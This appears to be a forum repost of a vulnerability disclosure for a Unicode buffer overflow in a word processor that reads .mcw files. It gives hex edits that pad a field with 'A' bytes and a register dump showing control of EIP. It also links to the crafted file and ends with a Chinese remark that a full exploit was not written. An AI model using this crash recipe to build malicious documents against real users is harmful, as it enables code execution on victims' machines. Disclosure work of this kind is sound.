文章作者：b_naamneh hotmail com

the unicode buffer overflow occurs when the user opens the malformed *.mcw document.

Proof of concept:
-----------------

by modifying the *.mcw file by using binary editor as follows

these lines were taken from .mcw file:

------snip---mcw-file----

复制内容到剪贴板

代码:

c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00
00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77

------snip---------------

change them as follows:

复制内容到剪贴板

代码:

c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73

------------

引用:

EAX = 00000000 EBX = 00000000 ECX = 00000006
EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0
EIP = 00410041 ESP = 00126110 EBP = 00410041
EFL = 00000246

------------
* modified .mcw file can be downloaded from:
http://study.haifa.ac.il/~bnaamnih/word/foo.mcw

本来想写个exploit的 结果 发现...*.mcw是for mac的
日啊....